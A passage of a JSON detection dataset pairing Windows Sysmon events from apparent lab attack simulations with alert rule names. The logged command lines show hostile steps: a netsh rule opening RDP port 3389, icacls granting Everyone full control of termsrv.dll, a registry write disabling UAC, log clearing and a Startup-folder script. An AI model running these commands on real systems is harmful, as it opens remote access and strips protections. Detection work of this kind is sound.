File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.607","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPCheck.exe","UtcTime":"2019-03-17 20:17:44.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5253,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.637155Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 
20:17:44.777","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPConf.exe","UtcTime":"2019-03-17 20:17:44.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5254,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.797385Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.458","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPWInst.exe","UtcTime":"2019-03-17 20:17:45.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5255,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.478364Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using 
NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.618","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\uninstall.bat","UtcTime":"2019-03-17 20:17:45.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5256,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.628580Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.648","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\update.bat","UtcTime":"2019-03-17 
20:17:45.648"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5257,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.648609Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","RDP Sensitive Settings Changed"],"event":{"Event":{"EventData":{"Details":"%%ProgramFiles%%\\RDP Wrapper\\rdpwrap.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\ServiceDll","UtcTime":"2019-03-17 20:18:05.086"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5265,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:05.086560Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","RDP Registry Modification","RDP Sensitive Settings Changed"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000000)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5267,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5269,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port or Application Allowed","Netsh RDP Port 
Opening"],"event":{"Event":{"EventData":{"CommandLine":"netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=784A50A6A09C25F011C3143DDD68E729,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst\" -i -o","ParentImage":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ParentProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ParentProcessId":3700,"ProcessGuid":"365ABB72-AB81-5C8E-0000-001024960C00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5270,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.312636Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant %%username%%:F","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010296C0D00","ProcessId":3536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.897"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5312,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:20:17.917561Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant *S-1-1-0:(F)","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010656E0D00","ProcessId":3652,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5313,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:20:17.927576Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000050)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"365ABB72-AC79-5C8E-0000-0010E1B50D00","ProcessId":2872,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber","UtcTime":"2019-03-17 
20:22:59.399"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5329,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:22:59.399761Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"System":{"Channel":"System","Computer":"PC01.example.corp","Correlation":null,"EventID":104,"EventRecordID":27736,"Execution_attributes":{"ProcessID":812,"ThreadID":3916},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security_attributes":{"UserID":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-19T23:34:25.894341Z"},"Version":0},"UserData":{"LogFileCleared":{"BackupPath":"","Channel":"System","SubjectDomainName":"EXAMPLE","SubjectUserName":"user01"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-30 
10:12:45.583","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-1EFA-5CC8-0000-0010D3DE1C00","ProcessId":3292,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\bs.ps1","UtcTime":"2019-04-30 10:12:45.583"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":8930,"Execution_attributes":{"ProcessID":1956,"ThreadID":1636},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-30T10:12:45.583363Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"DFAE8213-70EB-5CDD-0000-0010F66D0A00","ProcessId":3788,"RuleName":"technique_id=T1088,technique_name=Bypass User Account Control","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\EnableLUA","UtcTime":"2019-05-16 14:17:15.758"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":13,"EventRecordID":18619,"Execution_attributes":{"ProcessID":1780,"ThreadID":2204},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-16T14:17:15.763712Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Office 
Security Settings Changed"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","ProcessGuid":"365ABB72-92DF-5CDB-0000-0010A15E1300","ProcessId":3804,"RuleName":"Defense Evasion - access to the VBA project object model in the Macro Settings changed","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\AccessVBOM","UtcTime":"2019-05-15 04:18:40.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":17915,"Execution_attributes":{"ProcessID":2024,"ThreadID":1212},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-15T04:18:40.474644Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\HCJVGQ5XQYJQFTRJAKRF.temp","UtcTime":"2020-10-17 
16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419627,"Execution_attributes":{"ProcessID":3344,"ThreadID":4376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T16:27:10.787882Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP","UtcTime":"2020-10-17 16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419628,"Execution_attributes":{"ProcessID":3344,"ThreadID":4376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T16:27:10.791010Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Stop Windows Service"],"event":{"Event":{"EventData":{"CommandLine":"sc stop CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Service Control Manager 
Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"sc.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A17-5E76-0000-001062373A00","ProcessId":4876,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:35.023"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244333,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:35.026859Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Service Execution"],"event":{"Event":{"EventData":{"CommandLine":"net start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ProcessId":7072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.872"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244336,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:55.876452Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Service Execution"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=085E23DF67774ED89FD0215E1F144824F79F812B,MD5=63DD4523677E62A73A8A7494DB321EA2,SHA256=C687157FD58EAA51757CDA87D06C30953A31F03F5356B9F5A9C004FA4BAD4BF5,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net1.exe","ParentCommandLine":"net start CDPSvc","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ParentProcessId":7072,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010A92C3D00","ProcessId":7664,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.891"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244337,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:55.897450Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
